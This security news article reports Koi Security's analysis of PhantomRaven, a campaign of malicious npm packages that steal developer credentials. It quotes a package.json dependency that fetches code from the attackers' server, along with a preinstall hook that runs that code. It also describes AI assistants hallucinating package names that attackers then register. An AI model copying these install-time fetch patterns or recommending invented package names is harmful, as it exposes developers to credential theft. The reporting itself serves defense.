PhantomRaven: 126 Malicious npm Packages Steal Developer Tokens and Secrets Using Hidden Dependencies

Koi Security has uncovered a massive supply-chain campaign dubbed PhantomRaven, which has silently infected the npm ecosystem with 126 malicious packages that have been collectively downloaded over 86,000 times. The campaign, active since August 2025, is designed to steal npm authentication tokens, GitHub credentials, and CI/CD secrets — while concealing its malicious code in dependencies invisible to most security scanners.

Koi Security’s Wings risk engine first detected unusual activity in October 2025 when several npm packages were seen making external network requests during installation — all pointing to the same domain.

“Our risk engine, Wings, flagged something strange in October 2025. Packages making external network requests during installation — all to the same suspicious domain,” the team wrote.

When investigators began unraveling the campaign, they discovered that 80 of the malicious packages were still active, continuously collecting credentials from developer systems across the globe. The report outlines a clear timeline:

• August 2025: Campaign begins; first 21 packages removed by npm.
• September–October 2025: 80 more packages uploaded, evading detection.
• October 2025: Campaign discovered by Koi Security’s behavioral analysis engine.

Despite the sophisticated delivery, the attackers’ operational security was surprisingly weak, using sequential email accounts like jpdtester01@hotmail[.]com to jpdtester13@gmail[.]com, all tied to usernames such as npmhell and npmpackagejpd.

What made PhantomRaven so elusive was its use of Remote Dynamic Dependencies (RDD) — a rarely used npm feature allowing dependencies to be fetched directly from HTTP URLs instead of the npm registry.

On the surface, these malicious packages appeared clean, containing nothing more than harmless code like:

#!/usr/bin/env node‍

console.log('Hello, world!');

“Open up one of these malicious packages on npm. Check the source code. You’ll find something like this… Completely harmless. A simple hello world script,” the report explained.

The real payload, however, was pulled from an external server at install time:

"dependencies": {
  "ui-styles-pkg": "http://packages.storeartifact.com/npm/unused-imports"
}

Because npm and most scanners don’t follow HTTP-based dependency links, these packages appeared to have “0 dependencies”, bypassing nearly every automated security check.

“The malicious code? Sitting on packages.storeartifact.com, waiting to be fetched at install time.”

The moment developers ran npm install, the malicious dependency was fetched and executed automatically using npm’s preinstall lifecycle script:

"scripts": {
  "preinstall": "node index.js"
}

This design ensured that the payload executed without user consent, even if buried multiple layers deep in a dependency chain.

Koi Security notes, “Install a package that depends on a package that depends on a package with a malicious preinstall script? That code runs on your machine. Automatically.”

Once executed, PhantomRaven began an aggressive reconnaissance and exfiltration routine.

1. Identity Harvesting

The malware first searched the developer’s system for email addresses in:

• Environment variables

• .gitconfig

• .npmrc

• package.json

2. CI/CD Credential Theft

It then scanned for tokens and credentials from popular automation tools, including:

• GitHub Actions
• GitLab CI/CD
• Jenkins
• CircleCI
• npm authentication tokens

The report highlights, “They want to know everything about your infrastructure — GitHub Actions tokens, GitLab CI credentials, Jenkins credentials, CircleCI tokens, npm authentication tokens.”

3. System Fingerprinting

The malware compiled a complete system profile, capturing the victim’s public IP, hostname, OS, username, directory, and Node.js version — essential data for targeting corporate and cloud environments.

4. Redundant Exfiltration

Exfiltration routines used three parallel channels to ensure data exfil success:

• HTTP GET with data encoded in URLs
• HTTP POST with JSON payloads
• WebSocket fallback for restricted networks

“Even in restricted network environments with aggressive firewalls, they’re getting their data out,” Koi Security warns.

Perhaps the most alarming discovery is PhantomRaven’s novel infection vector, dubbed slopsquatting — an AI-driven evolution of typosquatting.

Unlike classic name impersonation, PhantomRaven authors created packages that AI assistants hallucinated as legitimate recommendations.

“When developers ask AI assistants like GitHub Copilot or ChatGPT for package recommendations, the models sometimes suggest plausible-sounding package names that don’t actually exist. PhantomRaven created those non-existent packages.”

Examples include:

• eslint-comments (real: eslint-plugin-eslint-comments)
• unused-imports (real: eslint-plugin-unused-imports)
• transform-react-remove-prop-types (real: babel-plugin-transform-react-remove-prop-types)

These AI-validated fakes were designed to trick developers into trusting malicious packages, blending social engineering with artificial intelligence errors.

Related Posts:

• North Korean Hackers Deploy RustDoor and Koi Stealer to Target Cryptocurrency Developers on macOS
• Github launches Python security alerts
• GlassWorm Supply Chain Worm Uses Invisible Unicode and Solana Blockchain for Stealth C2
• A Trojan in Disguise: New Python Package on PyPI Hides a Multi-Stage Malware Operation
• GreedyBear Unmasked: How Stealthy Firefox Extensions and Fake Sites Stole $1M in Crypto